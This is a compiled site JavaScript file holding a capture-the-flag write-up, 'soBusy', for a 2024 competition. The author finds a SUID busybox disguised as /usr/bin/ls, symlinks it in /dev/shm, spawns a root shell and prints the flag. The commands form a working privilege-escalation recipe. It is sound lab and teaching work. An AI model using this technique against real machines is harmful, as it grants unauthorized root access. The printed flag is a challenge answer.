PageSourceSearch

https://mistrale-wu.onrender.com/assets/index.html-gPUVGS8v.js

js mistrale-wu.onrender.com collected 2026-10-03 11:42:05 UTC 9,700 bytes, 32 lines download raw bytes

1import{_ as s,c as n,o as a,a as e}from"./app-BaeHwvN7.js";const t={},i=e(`<h1 id="😅-sobusy" tabindex="-1"><a class="header-anchor" href="#😅-sobusy"><span>😅 soBusy</span></a></h1><div class="custom-container tip"><p class="custom-container-title">👀 Before you start</p><p>You can donate to me via <a href="https://buymeacoffee.com/mistrale" target="_blank" rel="noopener noreferrer">Buy Me a Coffee</a> or follow me on <a href="https://github.com/MisTraleuh" target="_blank" rel="noopener noreferrer">Github</a></p></div><h2 id="🚩-getting-the-flag" tabindex="-1"><a class="header-anchor" href="#🚩-getting-the-flag"><span>🚩 Getting the Flag</span></a></h2><p>We find ourselves on a VM, aware that we are in a Docker because there is a <code>.dockerenv</code> file at the root of the system.</p><p>As with any good VM we land on, we perform basic commands to understand what we can do.</p><p>Normally, we run a <code>linpeas.sh</code> to get a full report of the machine. However, we do not have write permission in the <code>/tmp/</code> directory, and we cannot execute files we have created.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ <span class="token function">find</span> / <span class="token parameter variable">-perm</span> /4000 <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span>/dev/null</span>
2<span class="line">/usr/bin/sudo</span>
3<span class="line">/usr/bin/pkexec</span>
4<span class="line">/usr/bin/newuidmap</span>
5<span class="line">/usr/bin/gpasswd</span>
6<span class="line">/usr/bin/chsh</span>
7<span class="line">/usr/bin/chfn</span>
8<span class="line">/usr/bin/ls</span>
9<span class="line">/usr/bin/passwd</span>
10<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>It&#39;s quite odd to see that we have <code>/usr/bin/ls</code> with SUID. So, we try to execute it to see if we can do something with it.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ /usr/bin/ls <span class="token parameter variable">-la</span> /root</span>
11<span class="line">total <span class="token number">12</span></span>
12<span class="line">drwx------  <span class="token number">2</span> root root <span class="token number">4096</span> Jan <span class="token number">22</span> <span class="token number">12</span>:51 <span class="token builtin class-name">.</span></span>
13<span class="line">drwxr-xr-x <span class="token number">19</span> root root <span class="token number">4096</span> Jan <span class="token number">22</span> <span class="token number">12</span>:51 <span class="token punctuation">..</span></span>
14<span class="line">-rw-r--r--  <span class="token number">1</span> root root   <span class="token number">33</span> Jan <span class="token number">10</span>  <span class="token number">2024</span> flag.txt</span>
15<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>Indeed, our ls has SUID, so we can execute commands as root but only with our ls.</p><p>However, ls does not allow us to read files or execute them...</p><p>After some thought, I decide to perform an ls on the file <code>/usr/bin/ls</code> to see if I have a genuine ls binary or a malicious one.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ /usr/bin/ls <span class="token parameter variable">-la</span> /usr/bin/ls</span>
16<span class="line">-rwsr-xr-x <span class="token number">1</span> root root <span class="token number">188584</span> Jan <span class="token number">10</span>  <span class="token number">2024</span> /usr/bin/ls</span>
17<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div></div></div><p>As I suspected, we should not trust our first impression; we have an <code>ls</code> binary that is SUID. But it&#39;
17s not a <code>real</code> ls because a genuine <code>ls</code> binary should have this size:</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">MisTraleuh@/$ <span class="token function">ls</span> <span class="token parameter variable">-la</span> /bin/ls</span>
18<span class="line">-rwsr-sr-x <span class="token number">1</span> root root <span class="token number">138216</span> Jan  <span class="token number">8</span> <span class="token number">15</span>:56 /usr/bin/ls</span>
19<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div></div></div><p>By executing a help argument with <code>ls</code>, we encounter a surprising result:\`</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ /usr/bin/ls <span class="token parameter variable">--help</span></span>
20<span class="line">Usage: <span class="token function">ls</span> <span class="token punctuation">[</span>OPTION<span class="token punctuation">]</span><span class="token punctuation">..</span>. <span class="token punctuation">[</span>FILE<span class="token punctuation">]</span><span class="token punctuation">..</span>.</span>
21<span class="line">Usage: busybox <span class="token punctuation">[</span>function <span class="token punctuation">[</span>arguments<span class="token punctuation">]</span><span class="token punctuation">..</span>.<span class="token punctuation">]</span> </span>
22<span class="line">   or: busybox <span class="token parameter variable">--list</span></span>
23<span class="line">      <span class="token function">link</span> to busybox <span class="token keyword">for</span> each <span class="token keyword">function</span> they wish to use and BusyBox</span>
24<span class="line"><span class="token punctuation">[</span><span class="token punctuation">..</span>.<span class="token punctuation">]</span></span>
25<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>Thus, we have an <code>ls</code> binary that is also a <code>busybox</code> binary. Therefore, we can execute commands with this <code>ls</code> binary, which is in reality a busybox binary.</p><p>As mentioned earlier, even if the <code>/tmp/</code> directory is not writable, the <code>/dev/shm</code> directory is. So, we can execute commands in this directory.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ <span class="token builtin class-name">cd</span> /dev/shm</span>
26<span class="line">gcc2024@sobusy:/dev/shm$ <span class="token function">ln</span> <span class="token parameter variable">-s</span> /usr/bin/ls busybox</span>
27<span class="line">gcc2024@sobusy:/dev/shm$ ./busybox /bin/sh</span>
28<span class="line">root<span class="token comment"># id</span></span>
29<span class="line"><span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span></span>
30<span class="line">root<span class="token comment"># cat /root/flag.txt</span></span>
31<span class="line">GCC<span class="token punctuation">{</span>BusyBox_H4s_M0r3_Opti0ns_Th4n_LS<span class="token punctuation">}</span></span>
32<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div>`,20),l=[i];function o(p,c){return a(),n("div",null,l)}const u=s(t,[["render",o],["__file","index.html.vue"]]),d=JSON.parse('{"path":"/en/Gcc-2024/SoBusy/","title":"😅 soBusy","lang":"en-US","frontmatter":{},"headers":[{"level":2,"title":"🚩 Getting the Flag","slug":"🚩-getting-the-flag","link":"#🚩-getting-the-flag","children":[]}
32],"git":{},"filePathRelative":"en/Gcc-2024/SoBusy/README.md"}');export{u as comp,d as data};

Line numbers count LF bytes from the start of the resource, as the search results do. Vendor segments are library code the classifier recognised; they are stored but not indexed. Bytes are shown as Latin1 characters, one per byte.